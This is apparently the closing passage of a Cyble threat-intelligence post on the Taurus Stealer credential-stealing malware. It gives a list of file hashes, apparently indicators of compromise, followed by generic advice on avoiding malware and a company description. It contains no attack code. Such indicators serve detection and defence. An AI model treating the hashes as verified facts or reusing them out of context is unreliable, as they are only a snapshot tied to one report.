09b1884c9e34fb73fd8820788e34c771
1d57258b748a328c804c33b866a75493b82775378b08a0d568750d7f1a9f372a
4ecefa3082c61d0c7cee6f4438d0b7b010260ce638809232a64df1b207ec1aef
d936e05a74bea7e1af78c43dab6784da56656155ad1171afa66a96c0b579293f
ef56f5bdb299426395bac0c8540c6e20c6036e88ef89357798bdc3288af7a9f2
217f11d2a7400f686edd82df2a9522efdaa0bd86c016f2819bdba630460cef23
cfcc9f5dae8705b6f5d99109737589c909d085b512f80b845f8794271fcbbd7c
18e59e6c725f278f8adf1aad8b68b30177b7907242edfc8c65f29433478d0ee0
fa4dcf77e6fa451d6343ff052d3acde3fce39bb69b7646b98f8ea4b06dca871e
c229af843ec00e0fa544841ecb55d964224d83d57e9bdd898a439e069c47e3b2
51eeedbee2eec4743bd307623fadfa1fcacfe0a52a123a3f837e88a16c73ea82
c12f6d839c9c36a0b5338dcf68b70f3e2ab7d8897ab3e4c0b7761303c0f1dee9
b382816b88743f6f1065d0aecd802fc911f6248bc427fdde13b13be54b582182
d2953490aaea17e6aede57a69a6cf9c285f45f040ba23ccc827118d25b64250c
9a58842b001bda060d30f8d5b3d019de69859753a90c8e4000b6d9b087ad963c
6162ce1e5f90fa9d97c229b0a05397ca45e44d592ece79acf0192ab07ca316d1
37cb5ba10a33b84e1f23356b747788e10552b277603df066825f9ab3aaff1729
57cecbc3a91cf4d2c0c30a0acb61cf0849f053f32e46e11d1d3980a73121bad8
015cdaf3b1f42326b58911ef55e40cb2e04595baafeee680f18e9ed6e7795fc3
5025589b3072d7ff14376f8643132748dc9a334b9903a8d5ed4fd707d8fb5049
e18eeb050367f12be42d5c2d1e699c4aec866a3cdd3701dd7905a3726f722678

Image depicting the malware spread

How to avoid the installation of malware?

To prevent any type of malware infection, users should always-:

  • Be precautious in downloading files from online browsers or from emails having an unknown sender’s address.
  • Install reputable antivirus tools in the respective systems to prevent these types of malware infectious attacks.
  • Download any type of software from official web pages and via direct download links.
  • Installed software should be updated and activated via tools that are being provided by official developers.
  • Should regularly scan their systems for malware or any type of viruses.

Some of the research articles have also detailed manual steps that can be used by victims to remove Taurus Stealer from their systems.

About Cyble

Cyble is an Atlanta, US-based, global premium cyber-security firm with tools and capabilities to provide near real-time cyber threat intelligence. 

Cyble Inc.’s mission is to provide organizations with a real-time view of their supply chain cyber threats and risks. Their SaaS-based solution powered by machine learning and human analysis provides organizations’ insights to cyber threats introduced by suppliers and enables them to respond to them faster and more efficiently.

This monitoring and notification platform give the average consumer insights into their personal cybersecurity issues, allowing them to take action then as needed. It has recently earned accolades from Forbes as being the top 20 cyber-security companies to watch in 2020. 

Scroll to Top